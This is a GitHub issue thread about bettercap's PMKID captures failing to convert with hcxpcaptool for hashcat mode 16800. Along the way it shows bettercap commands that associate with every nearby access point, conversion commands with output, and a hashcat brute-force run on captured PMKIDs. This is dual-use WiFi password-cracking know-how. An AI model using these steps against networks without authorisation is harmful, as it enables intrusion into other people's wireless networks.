PMKID attack not compatible with hashcat mode 16800

[usiegl00]

Prerequisites

Done!

---

PMKID attack not compatible with hashcat mode 16800

Environment

This issue was encountered while following the RSN PMKID based attack guide.

Please provide:

• bettercap --version
• bettercap v2.24.1 (built for darwin amd64 with go1.12.7)
• sudo bettercap -iface en0
• wifi.recon on
• set wifi.show.sort clients desc
• set ticker.commands 'clear; wifi.show; wifi.assoc all'
• ticker on
• Full debug output while reproducing the issue ( sudo bettercap -iface en0 -debug ).
  wifi.recon on
set wifi.show.sort clients desc
set ticker.commands 'clear; wifi.show; wifi.assoc all'
ticker on
  192.168.0.0/24 > 192.168.0.192 » [10:41:06] [sys.log] [dbg] wifi hopping on channel 7
  192.168.0.0/24 > 192.168.0.192 » [10:41:06] [sys.log] [inf] wifi sending association request to AP xxx00000000-2.4G (channel:9 encryption:WPA2)
  192.168.0.0/24 > 192.168.0.192 » [10:41:06] [sys.log] [dbg] wifi hopping on channel 40
  192.168.0.0/24 > 192.168.0.192 » [10:41:06] [sys.log] [dbg] wifi got frame 1/4 of the aa:aa:aa:aa:aa:aa <-> rr:rr:rr:rr:rr:rr handshake (without PMKID) (anonce:c02feb54973cf00abd42b25533c07a78fb942f71345ca73adb54d19322609270)
  192.168.0.0/24 > 192.168.0.192 » [10:41:06] [sys.log] [dbg] wifi saving handshake frames to /Users/admin/bettercap-wifi-handshakes.pcap
  192.168.0.0/24 > 192.168.0.192 » [10:41:06] [sys.log] [dbg] wifi got frame 3/4 of the aa:aa:aa:aa:aa:aa <-> rr:rr:rr:rr:rr:rr handshake (mic:6ef4792d8f11881b40ca117a40254bb9)
  192.168.0.0/24 > 192.168.0.192 » [10:41:06] [sys.log] [dbg] wifi saving handshake frames to /Users/admin/bettercap-wifi-handshakes.pcap
  192.168.0.0/24 > 192.168.0.192 » [10:41:06] [sys.log] [dbg] wifi skipping dot11 packet with invalid checksum.
  192.168.0.0/24 > 192.168.0.192 » [10:41:06] [sys.log] [dbg] wifi skipping dot11 packet with invalid checksum.
  192.168.0.0/24 > 192.168.0.192 » [10:41:06] [sys.log] [dbg] wifi skipping dot11 packet with invalid checksum.
  192.168.0.0/24 > 192.168.0.192 » [10:41:06] [sys.log] [dbg] wifi got frame 1/4 of the bb:bb:bb:bb:bb:bb <-> rr:rr:rr:rr:rr:rr handshake (without PMKID) (anonce:bfdda0ff93a80b979b5db3ed01a0b7cd3f6aa9a5f118fddf6f9d7f57798e1978)
  192.168.0.0/24 > 192.168.0.192 » [10:41:06] [sys.log] [dbg] wifi saving handshake frames to /Users/admin/bettercap-wifi-handshakes.pcap
  192.168.0.0/24 > 192.168.0.192 » [10:41:06] [sys.log] [dbg] wifi got frame 1/4 of the cc:cc:cc:cc:cc:cc <-> rr:rr:rr:rr:rr:rr handshake (with PMKID) (anonce:05d32b34b777a5ab3165af3398afd24255c7a492f05bb3b5107d83f9cce8b82a)
  192.168.0.0/24 > 192.168.0.192 » [10:41:06] [sys.log] [dbg] wifi saving handshake frames to /Users/admin/bettercap-wifi-handshakes.pcap
  192.168.0.0/24 > 192.168.0.192 » [10:41:06] [wifi.client.handshake] captured 28:cf:e9:14:11:b1 -> xxx00000000-2.4G (1c:59:9b:ss:ss:ss) RSN PMKID to /Users/admin/bettercap-wifi-handshakes.pcap
  192.168.0.0/24 > 192.168.0.192 » [10:41:06] [sys.log] [dbg] wifi skipping dot11 packet with invalid checksum.
  sudo hcxpcaptool -k pmkid.16800 bettercap-wifi-handshakes.pcap

reading from bettercap-wifi-handshakes.pcap

summary:

file name........................: bettercap-wifi-handshakes.pcap
file type........................: pcap 2.4
file hardware information........: unknown
file os information..............: unknown
file application information.....: unknown
network type.....................: DLT_IEEE802_11_RADIO (127)
endianness.......................: little endian
read errors......................: flawless
packets inside...................: 9
skipped packets (damaged)........: 0
packets with GPS data............: 0
packets with FCS.................: 9
EAPOL packets (total)............: 9
EAPOL packets (WPA2).............: 9
PMKIDs (total)...................: 2
PMKIDs (WPA2)....................: 9
PMKIDs from access points........: 2
best PMKIDs......................: 2

• PMKID's do not get written to file

Steps to Reproduce

1. Make sure there are lots of WPA2 networks nearby
2. Run commands described in Environment
3. Get disappointed and resort to using Bettercap1.6.2^gem install bettercap^ on an open wifi

Expected behavior: Bettercap is compatible with hcxpcaptool and hashcat mode 16800

Actual behavior: You have to resort to mode 16801 which is very cumbersome

If you need anything don't hesitate ask!

--

♥ ANY INCOMPLETE REPORT WILL BE CLOSED RIGHT AWAY ♥

[evilsocket]

fixed by #603

[kam1kaze]

Tried to use the latest version compiled from the master branch (with the fix). But I still get no output after wifi.assoc command.

vagrant@kali:~$ /usr/local/bin/hcxpcaptool -k ./test123 /root/bettercap-wifi-handshakes.pcap

reading from bettercap-wifi-handshakes.pcap

summary capture file:
---------------------
file name........................: bettercap-wifi-handshakes.pcap
file type........................: pcap 2.4
file hardware information........: unknown
file os information..............: unknown
file application information.....: unknown
network type.....................: DLT_IEEE802_11_RADIO (127)
endianness.......................: little endian
read errors......................: flawless
minimum time stamp...............: 18.08.2019 17:11:58 (GMT)
maximum time stamp...............: 18.08.2019 17:12:03 (GMT)
packets inside...................: 33
skipped packets (damaged)........: 0
packets with GPS data............: 0
packets with FCS.................: 33
EAPOL packets (total)............: 33
EAPOL packets (WPA2).............: 33
PMKIDs (WPA2)....................: 33

[evilsocket]

I read PMKIDs (WPA2)....................: 33 ... seems fine, no?

[careyjames]

same here, and for the record is it -z or -k ???

hcxpcaptool -E essidlist -I identitylist -U usernamelist -z bettercap-wifi-handshakes.16800 bettercap-wifi-handshakes.pcap

reading from bettercap-wifi-handshakes.pcap

summary:

file name....................: bettercap-wifi-handshakes.pcap
file type....................: pcap 2.4
file hardware information....: unknown
file os information..........: unknown
file application information.: unknown
network type.................: DLT_IEEE802_11_RADIO (127)
endianness....................: little endian
read errors..................: flawless
packets inside...............: 21
skipped packets..............: 0
packets with GPS data........: 0
packets with FCS.............: 21
beacons (with ESSID inside)..: 2
EAPOL packets................: 19
EAPOL PMKIDs.................: 2
best handshakes..............: 2 (ap-less: 0)

0 PMKID(s) written to bettercap-wifi-handshakes.16800

[kam1kaze]

@evilsocket looks fine :) but there are no any output file.
BTW, hcxpcaptool was compiled from the master branch too.

[careyjames]

yeah missing output file...

[evilsocket]

given that the tool itself reports a correct amount of PMKIDs but is unable to dump them, i'd say it's its bug, not bettercap's ... but i'd dig into it to make sure that's the case 👍

[careyjames]

@evilsocket the most awesome, rock star, code god improvement would be a native choice of output file formats directly in bettercap 👌😁🥰💕🐾🏴‍☠️💀

[evilsocket]

@careyjames pcap is the most universal format for this stuff, i'd rather not introduce specific parts of code just to support external tools ... especially if those tools can read natively pcaps :)

[careyjames]

Ah , so then is there a way to crack pmkid without conversion???

[evilsocket]

no, i was referring to hcxpcaptool

[serializingme]

I was having the same problem and using bettercap from master fixed it. Follows the output of hcxpcaptool (version 5.1.4).

hcxpcaptool -z bettercap-wifi-handshakes.pmkid -V bettercap-wifi-handshakes.pcap 

reading from bettercap-wifi-handshakes.pcap
                                                
summary:                                        
--------
file name....................: bettercap-wifi-handshakes.pcap
file type....................: pcap 2.4
file hardware information....: unknown
file os information..........: unknown
file application information.: unknown
network type.................: DLT_IEEE802_11_RADIO (127)
endianness....................: little endian
read errors..................: flawless
packets inside...............: 27
skipped packets..............: 0
packets with GPS data........: 0
packets with FCS.............: 27
beacons (with ESSID inside)..: 12
probe responses..............: 1
EAPOL packets................: 14
EAPOL PMKIDs.................: 14

13 PMKID(s) written to bettercap-wifi-handshakes.pmkid

And the PMKID file is created.

ls -lh bettercap-wifi-handshakes.pmkid 
-rw-r--r-- 1 root root 1.1K Aug 19 22:00 bettercap-wifi-handshakes.pmkid

Hashcat is able to extract the PMKID as well.

hashcat -m16800 -a3 -w3 bettercap-wifi-handshakes.pmkid '?d?d?d?d?d?d?d?d'
hashcat (v4.2.1) starting...

OpenCL Platform #1: Apple
=========================
* Device #1: Intel(R) Core(TM) i7-4980HQ CPU @ 2.80GHz, skipped.
* Device #2: Iris Pro, 384/1536 MB allocatable, 40MCU
* Device #3: AMD Radeon R9 M370X Compute Engine, 512/2048 MB allocatable, 10MCU

Hashes: 13 digests; 13 unique digests, 13 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates

Applicable optimizers:
* Zero-Byte
* Brute-Force
* Slow-Hash-SIMD-LOOP

Minimum password length supported by kernel: 8
Maximum password length supported by kernel: 63

Watchdog: Temperature abort trigger disabled.

[s]tatus [p]ause [b]ypass [c]heckpoint [q]uit =>

[kam1kaze]

@evilsocket here is the same issue in hcxtools ZerBea/hcxtools#109

[ZerBea]

I got some issue reports that hcxpcaptool doesn't convert hashes from bettercap pacp files and run an analysis on them:
ZerBea/hcxtools#109 (comment)
ZerBea/hcxtools#110 (comment)

In both cases bettercap didn't captured the required frames and there was nothing to convert on requested option -z or -k
To convert a PMKID to hashcats format 16800 we need
ESSID (BSSID of PMKID, must match to this ESSID)
mac access point
mac client
PMKID (not zeroed)

Both bettercap pcap files doesn't provide a matching ESSID
detailed analysis:
ZerBea/hcxtools#110 (comment)
ZerBea/hcxtools#109 (comment)

BTW:
pcapng format support comments and much more. For example, hcxdumptool will store attack information and GPS positions in this comment fields. Wireshark and tshark understand and show this.
And there are some more advantages:
https://cloudshark.io/articles/5-reasons-to-move-to-pcapng
In the same way like hcxdumptool uses comment fields, hcxpcaptool store attack information in the message pair field (hccapx) to control hashcats nonce-error-corrections.
Also, WLAN traffic contain many useful frames to recover a PSK successfully. Unfortunately bettercap doesn't store them in its pcap file.
@evilsocket if you're interested to determine what bettercap is really missing when it ignores this frames, please mail me and I'll send you some nice examples (to improve bettercap).

[evilsocket]

@ZerBea did you try to pull and compile bettercap master? because after the last fix, the required frames are there ... actually, the required frames were there all along, bettercap simply wasn't adding the beacon frame to get the SSID from, which now it adds.

[ZerBea]

No, I only got the bettercap pcap files and analyzed them. Maybe they are captured by an older bettercap version. We can't determine this, because pcap doesn't support file hardware information, file os information and file application information.
How about adding the ESSID from the associationrequest / reassociationrequest. Both frames contain much more useful information than the beacon.
Some reassociationrequests also contain a PMKID.
How about adding all proberequests from associated clients? Some of them probing their PSK in the clear.

[evilsocket]

I don’t want to sound rude, but how about you send a PR given the strong opinions you have about what should be added to the software? :) The bug seems to be fixed with the aforementioned PR.

[ZerBea]

Unfortunately I'm not a go coder, so a PR is big disaster. :)
Sent you a PM via gmail.